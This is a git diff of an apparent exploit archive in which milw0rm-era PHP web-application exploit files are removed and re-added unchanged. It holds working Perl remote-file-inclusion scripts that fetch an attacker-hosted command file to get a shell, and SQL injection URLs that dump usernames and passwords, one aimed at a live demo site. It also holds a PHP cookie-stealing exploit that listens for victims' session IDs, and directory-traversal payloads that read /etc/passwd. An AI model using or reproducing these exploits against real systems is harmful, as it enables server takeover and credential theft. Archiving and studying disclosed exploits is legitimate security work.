-print "...........................[RST]...............................\n";
-print ". .\n";
-print ". LMS - LAN Management System 1.9.6 - RFI .\n";
-print ". .\n";
-print "...............................................................\n";
-print ". Romanian Security Team -> hTTp://RSTZONE.NET .\n";
-print ". [c]oded by Kw3rLN - office@rosecuritygroup.net .\n";
-print "...............................................................\n\n";
-
-my $kw3,$path,$shell,$conexiune,$cmd,$data ;
-
-
-if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
-
-$path = $ARGV[0];
-chomp($path);
-$shell = $ARGV[1];
-chomp($shell);
-
-$path = $path."/lib/language.php";
-
-
-sub usage(){
- print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n";
- print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
- print 'Shell : ';
- }
-
-while ()
-{
-print "[kw3rln].[rst] :~\$ ";
-chomp($cmd=);
-if ($cmd eq "exit") { exit(0);}
-
-$kw3 = $path."?_LIB_DIR=".$shell."?&cmd=".$cmd;
-if ($cmd eq "")
- { print "Enter your command !\n"; }
-else
- { $data=get($kw3); print $data ; }
-}
-
-# milw0rm.com [2007-06-20]
+#!/usr/bin/perl
+#
+# LMS - LAN Management System 1.9.6 - RFI
+#
+# Risk : High (Remote Code Execution)
+#
+# Url: http://www.lms.org.pl/download/1.9/lms-1.9.6.tar.gz
+#
+# Exploit:
+# http://site.com/[path]/lib/language.php?_LIB_DIR=[Evil_Script]
+#
+# (c)oded and f0und3d by Kw3[R]Ln
+#
+# Romanian Security Team .: hTTp://RSTZONE.NET :.
+#
+#
+# greetz to all RST [rstzone.net] MEMBERZ, Nemessis, Slick, str0ke, SpiridusuCaddy, zbeng, ENCODED, # Death, Ciupercutza [LUV TEAM] and all i forgot !
+#
+# Fuckz: GM [h4cky0u] -[bigest nub]
+
+use LWP::Simple;
+
+print "...........................[RST]...............................\n";
+print ". .\n";
+print ". LMS - LAN Management System 1.9.6 - RFI .\n";
+print ". .\n";
+print "...............................................................\n";
+print ". Romanian Security Team -> hTTp://RSTZONE.NET .\n";
+print ". [c]oded by Kw3rLN - office@rosecuritygroup.net .\n";
+print "...............................................................\n\n";
+
+my $kw3,$path,$shell,$conexiune,$cmd,$data ;
+
+
+if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
+
+$path = $ARGV[0];
+chomp($path);
+$shell = $ARGV[1];
+chomp($shell);
+
+$path = $path."/lib/language.php";
+
+
+sub usage(){
+ print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n";
+ print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
+ print 'Shell : ';
+ }
+
+while ()
+{
+print "[kw3rln].[rst] :~\$ ";
+chomp($cmd=);
+if ($cmd eq "exit") { exit(0);}
+
+$kw3 = $path."?_LIB_DIR=".$shell."?&cmd=".$cmd;
+if ($cmd eq "")
+ { print "Enter your command !\n"; }
+else
+ { $data=get($kw3); print $data ; }
+}
+
+# milw0rm.com [2007-06-20]
diff --git a/platforms/php/webapps/4089.pl b/platforms/php/webapps/4089.pl
index 47c46d050..2ecf33fe1 100755
--- a/platforms/php/webapps/4089.pl
+++ b/platforms/php/webapps/4089.pl
@@ -1,76 +1,76 @@ -#!/usr/bin/perl -# -# SerWeb 0.9.4- Remote FIle Inclusion -# -# This software, serweb, is a web interface for self-provisioning -# of users of SER SIP Server (http://www.iptel.org/ser/) -# -# Url: http://ftp.iptel.org/pub/ser/0.9.6/contrib/serweb-0.9.4.tar.gz -# -# Exploit: -# -http://site.com/[path]/load_lang.php?_SERWEB[serwebdir]=[Evil_Script] -# -# (c)oded and f0und3d by Kw3[R]Ln -# -# Romanian Security Team .: hTTp://RSTZONE.NET :. -# -# -# greetz to all RST [rstzone.net] MEMBERZ -# -# Fuckz: GM [h4cky0u] -[bigest nub], me - -use LWP::Simple; - -print -"...........................[RST]...............................\n"; -print ". -.\n"; -print ". SerWeb 0.9.4- Remote FIle Inclusion -.\n"; -print ". -.\n"; -print -"...............................................................\n"; -print ". Romanian Security Team -> hTTp://RSTZONE.NET -.\n"; -print ". [c]oded by Kw3rLN - office@rosecuritygroup.net -.\n"; -print -"...............................................................\n\n"; - -my $kw3,$path,$shell,$conexiune,$cmd,$data ; - - -if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);} - -$path = $ARGV[0]; -chomp($path); -$shell = $ARGV[1]; -chomp($shell); - -$path = $path."/load_lang.php"; - - -sub usage(){ - print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n"; - print "Example : perl $0 http://127.0.0.1 -http://site.com/cmd.txt\n\n"; - print 'Shell : '; - } - -while () -{ -print "[kw3rln].[rst] :~\$ "; -chomp($cmd=); -if ($cmd eq "exit") { exit(0);} - -$kw3 = $path."?_SERWEB[serwebdir]=".$shell."?&cmd=".$cmd; -if ($cmd eq "") - { print "Enter your command !\n"; } -else - { $data=get($kw3); print $data ; } -} - -# milw0rm.com [2007-06-21] +#!/usr/bin/perl +# +# SerWeb 0.9.4- Remote FIle Inclusion +# +# This software, serweb, is a web interface for self-provisioning +# of users of SER SIP Server (http://www.iptel.org/ser/) +# +# Url: http://ftp.iptel.org/pub/ser/0.9.6/contrib/serweb-0.9.4.tar.gz +# +# Exploit: +# 
+http://site.com/[path]/load_lang.php?_SERWEB[serwebdir]=[Evil_Script] +# +# (c)oded and f0und3d by Kw3[R]Ln +# +# Romanian Security Team .: hTTp://RSTZONE.NET :. +# +# +# greetz to all RST [rstzone.net] MEMBERZ +# +# Fuckz: GM [h4cky0u] -[bigest nub], me + +use LWP::Simple; + +print +"...........................[RST]...............................\n"; +print ". +.\n"; +print ". SerWeb 0.9.4- Remote FIle Inclusion +.\n"; +print ". +.\n"; +print +"...............................................................\n"; +print ". Romanian Security Team -> hTTp://RSTZONE.NET +.\n"; +print ". [c]oded by Kw3rLN - office@rosecuritygroup.net +.\n"; +print +"...............................................................\n\n"; + +my $kw3,$path,$shell,$conexiune,$cmd,$data ; + + +if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);} + +$path = $ARGV[0]; +chomp($path); +$shell = $ARGV[1]; +chomp($shell); + +$path = $path."/load_lang.php"; + + +sub usage(){ + print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n"; + print "Example : perl $0 http://127.0.0.1 +http://site.com/cmd.txt\n\n"; + print 'Shell : '; + } + +while () +{ +print "[kw3rln].[rst] :~\$ "; +chomp($cmd=); +if ($cmd eq "exit") { exit(0);} + +$kw3 = $path."?_SERWEB[serwebdir]=".$shell."?&cmd=".$cmd; +if ($cmd eq "") + { print "Enter your command !\n"; } +else + { $data=get($kw3); print $data ; } +} + +# milw0rm.com [2007-06-21] diff --git a/platforms/php/webapps/4090.pl b/platforms/php/webapps/4090.pl index 03456ba89..1c2564c3e 100755 --- a/platforms/php/webapps/4090.pl +++ b/platforms/php/webapps/4090.pl 
@@ -1,63 +1,63 @@
-#!/usr/bin/perl
-#
-# POWL - 0.94 - Remote File Inclusion Exploit
-#
-# Url: http://switch.dl.sourceforge.net/sourceforge/powl/powl_ontowiki-0.94.zip
-#
-# Exploit:
-# http://site.com/[path]/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=[Evil_Script>:]
-#
-# (c)oded and f0und3d by kw3rln
-#
-# Romanian Security Team .: hTTp://RSTZONE.NET :.
-#
-#
-# why i publish this lame bugs? just boring all day..drinking beer.. i will publish sqli too but rfi`s are
-# more searched than never :P
-#
-# greetz to all RST [rstzone.net] MEMBERZ
-
-use LWP::Simple;
-
-print "...........................[RST]...............................\n";
-print ". .\n";
-print ". POWL - 0.94 - Remote File Inclusion Exploit .\n";
-print ". .\n";
-print "...............................................................\n";
-print ". Romanian Security Team -> hTTp://RSTZONE.NET .\n";
-print ". [c]oded by Kw3rLN - office@rosecuritygroup.net .\n";
-print "...............................................................\n\n";
-
-my $kw3,$path,$shell,$conexiune,$cmd,$data ;
-
-
-if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
-
-$path = $ARGV[0];
-chomp($path);
-$shell = $ARGV[1];
-chomp($shell);
-
-$path = $path."/plugins/widgets/htmledit/htmledit.php";
-
-
-sub usage(){
- print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n";
- print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
- print 'Shell : ';
- }
-
-while ()
-{
-print "[kw3rln].[rst] :~\$ ";
-chomp($cmd=);
-if ($cmd eq "exit") { exit(0);}
-
-$kw3 = $path."?_POWL[installPath]=".$shell."?&cmd=".$cmd;
-if ($cmd eq "")
- { print "Enter your command !\n"; }
-else
- { $data=get($kw3); print $data ; }
-}
-
-# milw0rm.com [2007-06-22]
+#!/usr/bin/perl
+#
+# POWL - 0.94 - Remote File Inclusion Exploit
+#
+# Url: http://switch.dl.sourceforge.net/sourceforge/powl/powl_ontowiki-0.94.zip
+#
+# Exploit:
+# http://site.com/[path]/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=[Evil_Script>:]
+#
+# (c)oded and f0und3d by kw3rln
+#
+# Romanian Security Team .: hTTp://RSTZONE.NET :.
+#
+#
+# why i publish this lame bugs? just boring all day..drinking beer.. i will publish sqli too but rfi`s are
+# more searched than never :P
+#
+# greetz to all RST [rstzone.net] MEMBERZ
+
+use LWP::Simple;
+
+print "...........................[RST]...............................\n";
+print ". .\n";
+print ". POWL - 0.94 - Remote File Inclusion Exploit .\n";
+print ". .\n";
+print "...............................................................\n";
+print ". Romanian Security Team -> hTTp://RSTZONE.NET .\n";
+print ". [c]oded by Kw3rLN - office@rosecuritygroup.net .\n";
+print "...............................................................\n\n";
+
+my $kw3,$path,$shell,$conexiune,$cmd,$data ;
+
+
+if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
+
+$path = $ARGV[0];
+chomp($path);
+$shell = $ARGV[1];
+chomp($shell);
+
+$path = $path."/plugins/widgets/htmledit/htmledit.php";
+
+
+sub usage(){
+ print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n";
+ print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
+ print 'Shell : ';
+ }
+
+while ()
+{
+print "[kw3rln].[rst] :~\$ ";
+chomp($cmd=);
+if ($cmd eq "exit") { exit(0);}
+
+$kw3 = $path."?_POWL[installPath]=".$shell."?&cmd=".$cmd;
+if ($cmd eq "")
+ { print "Enter your command !\n"; }
+else
+ { $data=get($kw3); print $data ; }
+}
+
+# milw0rm.com [2007-06-22]
diff --git a/platforms/php/webapps/4091.txt b/platforms/php/webapps/4091.txt
index bffdcc0c8..18685f551 100755
--- a/platforms/php/webapps/4091.txt
+++ b/platforms/php/webapps/4091.txt
@@ -1,33 +1,33 @@
-# Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities
-
-# D.Script :
- http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip
-
-# V.Code :
- require $sunPath.'config.php';
- require_once $sunPath.'dbms/'.$dbtype.'.php';
-# In :
- /include.php
-
-# Exploits :
- /include.php?sunPath=Shell.txt?
-
-# V.Code 2 :
-
-
-# In :
- /skin/board/default/doctype.php
-
-# Exploits 2 :
- /skin/board/default/doctype.php?dir=Shell.txt?
-
-# Discovered by:
- GoLd_M = [Mahmood_ali]
-
-# Homepage:
- http://www.Tryag.Com/cc
-
-# Sp.Thanx To :
- Tryag-Team & Asb-May's Group
-
-# milw0rm.com [2007-06-22]
+# Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities
+
+# D.Script :
+ http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip
+
+# V.Code :
+ require $sunPath.'config.php';
+ require_once $sunPath.'dbms/'.$dbtype.'.php';
+# In :
+ /include.php
+
+# Exploits :
+ /include.php?sunPath=Shell.txt?
+
+# V.Code 2 :
+
+
+# In :
+ /skin/board/default/doctype.php
+
+# Exploits 2 :
+ /skin/board/default/doctype.php?dir=Shell.txt?
+
+# Discovered by:
+ GoLd_M = [Mahmood_ali]
+
+# Homepage:
+ http://www.Tryag.Com/cc
+
+# Sp.Thanx To :
+ Tryag-Team & Asb-May's Group
+
+# milw0rm.com [2007-06-22]
diff --git a/platforms/php/webapps/4092.txt b/platforms/php/webapps/4092.txt
index 6fcb3082f..2f9487a24 100755
--- a/platforms/php/webapps/4092.txt
+++ b/platforms/php/webapps/4092.txt
@@ -1,187 +1,187 @@ -Application: NetClassifieds: --Free Edition --Standard Edition --Professional Edition --Premium Edition -Web Site: http://www.scriptdevelopers.net/ -Versions: all -Platform: linux, windows -Bug: multiple injection sql , xss , full path -Fix Available: Yes - - -------------------------------------------------------- - -1) Introduction -2) Bug -3) The Code -4) Proof of concept -5) Fix -6)Conclusion - -=========== -1) Introduction -=========== - -"NetClassifieds Premium Edition has been built on the premise of making every -classifieds site feel like it was custom written for the purpose for which it's being used. -Automotive Sites, Horse Sites, Reality Sites, General Classifieds Sites or any other type -of classifieds site you can think of will find a perfect match in NetClassifieds" - -====== -2) Bug -====== - -injection sql , xss , full path - -=============== -3) Vulnerable code: -=============== -in Common.php - -line 310: - -function CCStrip($value) -{ -if(get_magic_quotes_gpc() == 0) -return $value; -else -return stripslashes($value); // ==> wtf... 0-o -} - - - -ligne 350: - -function CCGetFromPost($parameter_name, $default_value) -{ -global $HTTP_POST_VARS; - -$parameter_value = ""; -if(isset($HTTP_POST_VARS[$parameter_name])) -$parameter_value = CCStrip($HTTP_POST_VARS[$parameter_name]); -else -$parameter_value = $default_value; - -return $parameter_value; -} - - -line 365: - -function CCGetFromGet($parameter_name, $default_value) -{ -global $HTTP_GET_VARS; - -$parameter_value = ""; -if(isset($HTTP_GET_VARS[$parameter_name])) -$parameter_value = CCStrip($HTTP_GET_VARS[$parameter_name]); -else -$parameter_value = $default_value; - -return $parameter_value; -} - -nothing is filtred .... - -let's see how it goes in viewcat.php: - -line 63: -include(RelativePath . 
"/Common.php"); - -line 519: -$this->ds->Parameters["urlCatID"] = CCGetFromGet("CatID", ""); - -line 909: -$catdb1 = new clsDBNetConnect; - -$catdb1->connect(); - -$newSQL1 = "SELECT cat_id FROM categories WHERE sub_cat_id='" . CCGetFromGet("CatID", "") . "'"; - -$incat = "'" . CCGetFromGet("CatID", "") . "'"; - - -I wont past every line of this code , because EVERY parameter is vulnerable to sql injection , XSS , full path ... - -===== -4)proof of concept -===== - - -exemple of exploitation : -1) http://site.com/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/* -==> ( Database error: Invalid SQL: SELECT name, sub_cat_id, cat_id FROM categories WHERE cat_id=username@mail.com ) - -2)http://site.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/* -==> The value in field urls_user_id is not valid. (passwd_PLAIN_TEXT) - -// there's absolutly no encryption in this script for stored password , or sensitive data ... - -every input are vulnerable to XSS attacks ( there's maybe 40 inputs ... ) via mysql errors , php error , and via -various unfiltred forms . -===== -5) Fix -===== -scriptdevelopers has been advised , i dont think they will release any patch at the moment . - -here's my "quick patch" : - -1) in Common.php: -line 30 : -ADD: -ini_set(display_errors,"0"); -( in a production mode , no one needs to know your errors .. 
and this avoid xss via php error ) - -ligne 350: -function CCGetFromPost // for every POST request -avant : return $parameter_value; -apres : return preg_replace('/[^a-z0-9]/i', '', $parameter_value); //only 0 to 9 and a to z caracters allowed - - -line 365: -function CCGetFromGet // for every GET request -replace : -return $parameter_value; -BY -return preg_replace('/[^a-z0-9]/i', '', $parameter_value); - -2) in Mysql_db.php -line 52 : -var $Halt_On_Error = "yes"; ## "yes" (halt with message), "no" (ignore errors quietly), "report" (ignore errror, but spit a warning) - -set the value at "no" ( by default it's yes ) -this will avoid juicy errors , such as table name and the complete query - -3) imageresizer.php - -line 2: -ADD : -ini_set(display_errors,"0"); -( same reason as Common.php ) - -line 100 : -replace : echo("
    $msg
    file=".__FILE__."
    ") -BY -echo("
    error while processing your request

    "); - -".__FILE__." show the full path, no one need to know where is located your script on the server . -and usually a full path give the username for the ftp , or cpanel . -( /directory/your_user/www/file.php ) - - -===== -5) Conclusion -===== - -This script has not been develloped in a secure way, and it's dangerous -to use it UNPATCHED - - - - - -regards laurent gaffie -contact : laurent.gaffie@gmail.com - -# milw0rm.com [2007-06-22] +Application: NetClassifieds: +-Free Edition +-Standard Edition +-Professional Edition +-Premium Edition +Web Site: http://www.scriptdevelopers.net/ +Versions: all +Platform: linux, windows +Bug: multiple injection sql , xss , full path +Fix Available: Yes + + +------------------------------------------------------- + +1) Introduction +2) Bug +3) The Code +4) Proof of concept +5) Fix +6)Conclusion + +=========== +1) Introduction +=========== + +"NetClassifieds Premium Edition has been built on the premise of making every +classifieds site feel like it was custom written for the purpose for which it's being used. +Automotive Sites, Horse Sites, Reality Sites, General Classifieds Sites or any other type +of classifieds site you can think of will find a perfect match in NetClassifieds" + +====== +2) Bug +====== + +injection sql , xss , full path + +=============== +3) Vulnerable code: +=============== +in Common.php + +line 310: + +function CCStrip($value) +{ +if(get_magic_quotes_gpc() == 0) +return $value; +else +return stripslashes($value); // ==> wtf... 
0-o +} + + + +ligne 350: + +function CCGetFromPost($parameter_name, $default_value) +{ +global $HTTP_POST_VARS; + +$parameter_value = ""; +if(isset($HTTP_POST_VARS[$parameter_name])) +$parameter_value = CCStrip($HTTP_POST_VARS[$parameter_name]); +else +$parameter_value = $default_value; + +return $parameter_value; +} + + +line 365: + +function CCGetFromGet($parameter_name, $default_value) +{ +global $HTTP_GET_VARS; + +$parameter_value = ""; +if(isset($HTTP_GET_VARS[$parameter_name])) +$parameter_value = CCStrip($HTTP_GET_VARS[$parameter_name]); +else +$parameter_value = $default_value; + +return $parameter_value; +} + +nothing is filtred .... + +let's see how it goes in viewcat.php: + +line 63: +include(RelativePath . "/Common.php"); + +line 519: +$this->ds->Parameters["urlCatID"] = CCGetFromGet("CatID", ""); + +line 909: +$catdb1 = new clsDBNetConnect; + +$catdb1->connect(); + +$newSQL1 = "SELECT cat_id FROM categories WHERE sub_cat_id='" . CCGetFromGet("CatID", "") . "'"; + +$incat = "'" . CCGetFromGet("CatID", "") . "'"; + + +I wont past every line of this code , because EVERY parameter is vulnerable to sql injection , XSS , full path ... + +===== +4)proof of concept +===== + + +exemple of exploitation : +1) http://site.com/ViewCat.php?CatID=-8+union+select+1,email,3+from+users/* +==> ( Database error: Invalid SQL: SELECT name, sub_cat_id, cat_id FROM categories WHERE cat_id=username@mail.com ) + +2)http://site.com/ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1/* +==> The value in field urls_user_id is not valid. (passwd_PLAIN_TEXT) + +// there's absolutly no encryption in this script for stored password , or sensitive data ... + +every input are vulnerable to XSS attacks ( there's maybe 40 inputs ... ) via mysql errors , php error , and via +various unfiltred forms . +===== +5) Fix +===== +scriptdevelopers has been advised , i dont think they will release any patch at the moment . 
+ +here's my "quick patch" : + +1) in Common.php: +line 30 : +ADD: +ini_set(display_errors,"0"); +( in a production mode , no one needs to know your errors .. and this avoid xss via php error ) + +ligne 350: +function CCGetFromPost // for every POST request +avant : return $parameter_value; +apres : return preg_replace('/[^a-z0-9]/i', '', $parameter_value); //only 0 to 9 and a to z caracters allowed + + +line 365: +function CCGetFromGet // for every GET request +replace : +return $parameter_value; +BY +return preg_replace('/[^a-z0-9]/i', '', $parameter_value); + +2) in Mysql_db.php +line 52 : +var $Halt_On_Error = "yes"; ## "yes" (halt with message), "no" (ignore errors quietly), "report" (ignore errror, but spit a warning) + +set the value at "no" ( by default it's yes ) +this will avoid juicy errors , such as table name and the complete query + +3) imageresizer.php + +line 2: +ADD : +ini_set(display_errors,"0"); +( same reason as Common.php ) + +line 100 : +replace : echo("
    $msg
    file=".__FILE__."
    ") +BY +echo("
    error while processing your request

    "); + +".__FILE__." show the full path, no one need to know where is located your script on the server . +and usually a full path give the username for the ftp , or cpanel . +( /directory/your_user/www/file.php ) + + +===== +5) Conclusion +===== + +This script has not been develloped in a secure way, and it's dangerous +to use it UNPATCHED + + + + + +regards laurent gaffie +contact : laurent.gaffie@gmail.com + +# milw0rm.com [2007-06-22] diff --git a/platforms/php/webapps/4095.txt b/platforms/php/webapps/4095.txt index 38489daef..b97a260d2 100755 --- a/platforms/php/webapps/4095.txt +++ b/platforms/php/webapps/4095.txt 
@@ -1,40 +1,40 @@ ---==+================================================================================+==-- ---==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- ---==+================================================================================+==-- - - - -AUTHOR: t0pP8uZz & xprog - - -SCRIPT DOWNLOAD: PAY SCRIPT - - -SITE: http://www.netartmedia.net/pharmacysystem/ - - -DORK: N/A - - -EXPLOITS: - -EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users -EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users - -EXAMPLES: - -EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users - -NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix -follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to -see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection -if you cant do that then dont use the exploit. 
- -GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net - - ---==+================================================================================+==-- ---==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- ---==+================================================================================+==-- - -# milw0rm.com [2007-06-24] +--==+================================================================================+==-- +--==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- +--==+================================================================================+==-- + + + +AUTHOR: t0pP8uZz & xprog + + +SCRIPT DOWNLOAD: PAY SCRIPT + + +SITE: http://www.netartmedia.net/pharmacysystem/ + + +DORK: N/A + + +EXPLOITS: + +EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users +EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users + +EXAMPLES: + +EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users + +NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix +follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to +see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection +if you cant do that then dont use the exploit. 
+ +GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net + + +--==+================================================================================+==-- +--==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- +--==+================================================================================+==-- + +# milw0rm.com [2007-06-24] diff --git a/platforms/php/webapps/4096.php b/platforms/php/webapps/4096.php index fe472fcb1..848da5c8b 100755 --- a/platforms/php/webapps/4096.php +++ b/platforms/php/webapps/4096.php 
@@ -1,952 +1,952 @@ - sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196 -# [/]Waiting for connection on http://90.27.10.196:80/ -# [!]Now you have to make the victim to click on the url -# [+]Received 395 bytes from 182.26.54.2:2007 -# [+]Sending 366 bytes to 182.26.54.2:2007 -# [+]Received 326 bytes from 182.26.54.2:2009 -# [+]Sending 366 bytes to 182.26.54.2:2009 -# [+]Received 692 bytes from 182.26.54.2:2010 -# [!]Received one cookie from 182.26.54.2:2010 -# [/]Verifying if there is a valid session id cookie -# [-]No: pollvote=1 -# [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b -# [+]The created socket has been shut down -# $shell> whoami -# darkfig -# -if($argc < 5) -{ -print(" ------------- Pluxml 0.3.1 Remote Code Execution Exploit ------------- ---------------------------------------------------------------------- - Credits: DarkFig - URL: acid-root.new.fr || mgsdl.free.fr - IRC: #acidroot@irc.worldnet.net - Note: Coded for fun 8) ---------------------------------------------------------------------- - Usage: $argv[0] -url <> -ip <> [Options] - Params: -url For example http://victim.com/pluxml0.3.1/ - -ip The IP that will be bound to the socket - Options: -port The socket will listen on this port (default=80) - -proxy If you wanna use a proxy - -proxyauth Basic authentification ---------------------------------------------------------------------- -");exit(1); -} - -# PhpSploit object -#################### -$xpl = new phpsploit(); -$xpl->agent('Firefox'); - -# Server -########## -$server_addr = getparam('ip',1); -$server_port = (getparam('port')!='') ? getparam('port') : '80'; -$server_url = "http://$server_addr:$server_port/"; - -# Victim -########## -$hack = getparam('url',1); -$html = "

    hello :)

    \n"; - -# Apparently my XSS bypass NoScript protection -################################################ -$xss = " - at: http://[URL]/room.php?slc_lang=fa&sid=1&user_id=1 - ------------- - 3.7. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation. - ------------- - First, clear the site's cookies, and then goto: - http://[URL]/homepg/index.php?PHPSESSID=BugReportIRSessionFixation - http://[URL]/homepg/login.php?PHPSESSID=BugReportIRSessionFixation - ------------- -#################### -4. Solution: -#################### - Source codes are encrypted. Wait for vendor patch. -#################### -5. Credit: -#################### -AmnPardaz Security Research & Penetration Testing Group -Contact: admin[4t}bugreport{d0t]ir -WwW.BugReport.ir -WwW.AmnPardaz.com - -# milw0rm.com [2008-06-19] +########################## www.BugReport.ir ####################################### +# +# AmnPardaz Security Research Team +# +# Title: Academic Web Tools CMS Multiple Vulnerabilities +# Vendor: www.yektaweb.com +# Vulnerable Version: 1.4.2.8 and prior versions +# Exploit: Available +# Impact: Medium +# Fix: N/A +# Original Advisory: www.bugreport.ir/?/44 +################################################################################### + +#################### +1. Description: +#################### + ACADEMIC WEB TOOLS (AWT) yektaweb is a Persian content management system (CMS) which can manage university conferences and journals too. +#################### +2. Vulnerabilities: +#################### + 2.1. Directory Traversal in "/download.php" in "dfile" parameter. + 2.1.1. Exploit: + Check the exploit/POC section. + 2.2. Injection Flaws. SQL Injection in "/rating.php" in "book_id" parameter. + 2.2.1. Exploit: + Check the exploit/POC section. + 2.3. Cross Site Scripting (XSS). Reflected XSS attack in "/login.php" in URL parameters. + 2.3.1. Exploit: + Check the exploit/POC section. + 2.4. Cross Site Scripting (XSS). 
Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters. + 2.3.1. Exploit: + Check the exploit/POC section. + 2.5. Cross Site Scripting (XSS). Reflected redirect XSS attack in "/rss_getfile.php" in "file" parameters. + 2.4.1. Exploit: + Check the exploit/POC section. + 2.6. Cross Site Scripting (XSS). Stored XSS attack in "/room.php" chat service. + 2.5.1. Exploit: + Check the exploit/POC section. + 2.7. Session Management Flaw. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation. + 2.5.1. Exploit: + Check the exploit/POC section. +#################### +3. Exploits/POCs: +#################### + Original Exploit URL: http://bugreport.ir/index.php?/44/exploit + 3.1. Directory Traversal in "/download.php" in "dfile" parameter. + ------------- + http://[URL]/download.php?dfile=../../../../../../etc/passwd + http://[URL]/download.php?dfile=../../../../../../../etc/crontab + ------------- + 3.2. SQL Injection in "/rating.php" in "book_id" parameter. + ------------- +
    +
    + + + + ------------- + 3.3. Reflected XSS attack in "/login.php" in URL parameters. + ------------- + http://[URL]/login.php?Fake= + ------------- + 3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters. + ------------- + http://[URL]/hta/htmlarea.js.php?glb_sid= + ------------- + 3.5. Reflected redirect XSS attack in "rss_getfile.php" in "file" parameters. + ------------- + http://[URL]/rss_getfile.php?file=http://BugReport.ir + ------------- + 3.6. Reflected XSS attack in "room.php". + ------------- + First of all, login into the site. + Now submit this : + at: http://[URL]/room.php?slc_lang=fa&sid=1&user_id=1 + ------------- + 3.7. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation. + ------------- + First, clear the site's cookies, and then goto: + http://[URL]/homepg/index.php?PHPSESSID=BugReportIRSessionFixation + http://[URL]/homepg/login.php?PHPSESSID=BugReportIRSessionFixation + ------------- +#################### +4. Solution: +#################### + Source codes are encrypted. Wait for vendor patch. +#################### +5. Credit: +#################### +AmnPardaz Security Research & Penetration Testing Group +Contact: admin[4t}bugreport{d0t]ir +WwW.BugReport.ir +WwW.AmnPardaz.com + +# milw0rm.com [2008-06-19] diff --git a/platforms/php/webapps/5862.txt b/platforms/php/webapps/5862.txt index 24558d3fb..cc645876a 100755 --- a/platforms/php/webapps/5862.txt +++ b/platforms/php/webapps/5862.txt 
@@ -1,30 +1,30 @@
- :::::::-. ... ::::::. :::.
- ;;, `';, ;; ;;;`;;;;, `;;;
- `[[ [[[[' [[[ [[[[[. '[[
- $$, $$$$ $$$ $$$ "Y$c$$
- 888_,o8P'88 .d888 888 Y88
- MMMMP"` "YmmMMMM"" MMM YM
-
- [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #################################################################
- # [ samart-cms 2.0 ] Remote SQL Injection Vulnerability #
- #################################################################
- #
- # Script site: http://samart.6x.to/
- #
- # Vuln:
